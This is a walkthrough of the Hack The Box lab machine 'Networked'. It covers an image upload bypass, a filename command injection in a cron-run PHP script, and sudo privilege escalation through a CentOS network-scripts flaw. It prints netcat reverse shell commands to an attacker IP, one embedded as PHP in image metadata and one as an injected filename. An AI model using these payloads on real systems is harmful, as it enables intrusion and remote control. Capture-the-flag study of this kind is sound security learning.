Hack The Box

HackTheBox “Networked” Walkthrough

Networked, an easy-level Linux OS machine on HackTheBox, it entailed the exploitation of a susceptible file upload functionality to establish initial entry, followed by the utilization of multiple scripts running as…

Networked, an easy-level Linux OS machine on HackTheBox, it entailed the exploitation of a susceptible file upload functionality to establish initial entry, followed by the utilization of multiple scripts running as privileged rights on the target which in turn elevated our privileges up to the root level.

HackTheBox “Networked” Walkthrough, figure 1

Let’s get started! 🚀

Recon & Enumeration

Let’s use nmap to full scan for open ports and services:

HackTheBox “Networked” Walkthrough, figure 2

Visit the target at port 80.

HackTheBox “Networked” Walkthrough, figure 3

Check the page source.

HackTheBox “Networked” Walkthrough, figure 4

It indicates an upload and gallery places. To scan for hidden files or directories, let’s initiate a directory busting with Dirsearch.

HackTheBox “Networked” Walkthrough, figure 5

Visit upload.php.

HackTheBox “Networked” Walkthrough, figure 6

It confirms to us that there is a place to upload files, let’s check photos.php.

HackTheBox “Networked” Walkthrough, figure 7

It shows that it is like a place for the uploaded photos, let’s visit backup directory.

HackTheBox “Networked” Walkthrough, figure 8

Download and extract the archive file “backup.tar.”

HackTheBox “Networked” Walkthrough, figure 9

The archive file looks like the source code for the site.

Let’s have a look at the content of upload.php.

└─$ cat upload.php <?phprequire '/var/www/html/lib.php';define("UPLOAD_DIR", "/var/www/html/uploads/");if( isset($_POST['submit']) ) {  if (!empty($_FILES["myFile"])) {    $myFile = $_FILES["myFile"];    if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {      echo '<pre>Invalid image file.</pre>';      displayform();    }    if ($myFile["error"] !== UPLOAD_ERR_OK) {        echo "<p>An error occurred.</p>";        displayform();        exit;    }    //$name = $_SERVER['REMOTE_ADDR'].'-'. $myFile["name"];    list ($foo,$ext) = getnameUpload($myFile["name"]);    $validext = array('.jpg', '.png', '.gif', '.jpeg');    $valid = false;    foreach ($validext as $vext) {      if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {        $valid = true;      }    }    if (!($valid)) {      echo "<p>Invalid image file</p>";      displayform();      exit;    }    $name = str_replace('.','_',$_SERVER['REMOTE_ADDR']).'.'.$ext;    $success = move_uploaded_file($myFile["tmp_name"], UPLOAD_DIR . $name);    if (!$success) {        echo "<p>Unable to save file.</p>";        exit;    }    echo "<p>file uploaded, refresh gallery</p>";    // set proper permissions on the new file    chmod(UPLOAD_DIR . $name, 0644);  }} else {  displayform();}?>

The upload functionlity at upload.php permits only images with the file extensions ‘.jpg’, ‘.png’, ‘.gif’, ‘.jpeg’, and a size not exceeding 60000 bytes.

I intend to upload the machine card information image after reducing its size to below 60000 bytes, and subsequently injecting a reverse shell payload using “exiftool” and then embedding a php extension.

exiftool -DocumentName='<?php system("nc 10.10.14.8 4343 -e /bin/sh"); ?>' shell.jpg

HackTheBox “Networked” Walkthrough, figure 10

Next, we start a listener accordingly.

HackTheBox “Networked” Walkthrough, figure 11

Upload the image shell.php.jpg.

HackTheBox “Networked” Walkthrough, figure 12

We access photos.php.

HackTheBox “Networked” Walkthrough, figure 13

Once photos.php is loaded, we can see that we get a connection on our listener.

HackTheBox “Networked” Walkthrough, figure 14

Let’s have a look around.

HackTheBox “Networked” Walkthrough, figure 15

Notably, the file “/home/guly/check_attack.php” is executed every 3 minutes according to “crontab.guly.”

Let’s have a look at “/home/guly/check_attack.php”.

sh-4.2$ cat check_attack.phpcat check_attack.php<?phprequire '/var/www/html/lib.php';$path = '/var/www/html/uploads/';$logpath = '/tmp/attack.log';$to = 'guly';$msg= '';$headers = "X-Mailer: check_attack.php\r\n";$files = array();$files = preg_grep('/^([^.])/', scandir($path));foreach ($files as $key => $value) {        $msg='';  if ($value == 'index.html') {        continue;  }  #echo "-------------\n";  #print "check: $value\n";  list ($name,$ext) = getnameCheck($value);  $check = check_ip($name,$value);  if (!($check[0])) {    echo "attack!\n";    # todo: attach file    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);    exec("rm -f $logpath");    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");    echo "rm -f $path$value\n";    mail($to, $msg, $msg, $headers, "-F$value");  }}?>

The highlighted line: exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); raises immediate concern due to its lack of filtering, making it susceptible to command injection. The variables $path and $value represent the uploads directory path and the potentially malicious file's name, respectively.

By crafting a payload file in the /var/www/html/uploads directory with a name starting with a semicolon (;), we can execute arbitrary commands, including a reverse shell command.

Let’s first start a listener.

HackTheBox “Networked” Walkthrough, figure 16

We inject the command “; nc 10.10.14.8 4343 -c bash”.

HackTheBox “Networked” Walkthrough, figure 17

On our listener.

HackTheBox “Networked” Walkthrough, figure 18

We get a shell as guly user profile.

Let’s list the privileges granted to the user.

HackTheBox “Networked” Walkthrough, figure 19

Guly can run “/usr/local/sbin/changename.sh” sudoed without a password.

Let’s have a look at “/usr/local/sbin/changename.sh”.

[guly@networked ~]$ ls -lah /usr/local/sbin/changename.shls -lah /usr/local/sbin/changename.sh-rwxr-xr-x 1 root root 422 Jul  8  2019 /usr/local/sbin/changename.sh[guly@networked ~]$ cat /usr/local/sbin/changename.shcat /usr/local/sbin/changename.sh#!/bin/bash -pcat > /etc/sysconfig/network-scripts/ifcfg-guly << EoFDEVICE=guly0ONBOOT=noNM_CONTROLLED=noEoFregexp="^[a-zA-Z0-9_\ /-]+$"for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do        echo "interface $var:"        read x        while [[ ! $x =~ $regexp ]]; do                echo "wrong input, try again"                echo "interface $var:"                read x        done        echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-gulydone  /sbin/ifup guly0

The script enables a network inteface and start asking the user for the name, proxy_method, browser_only, and bootproto of the interface.

As you can find in the link here, A vulnerability impacting the network-scripts service in CentOS allows unauthorized execution of Bash commands as root when spaces are added to certain attributes.

We will run the script and put a phrase followed by bash shell command in an intention to get a root bash shell.

HackTheBox “Networked” Walkthrough, figure 20

Cheers.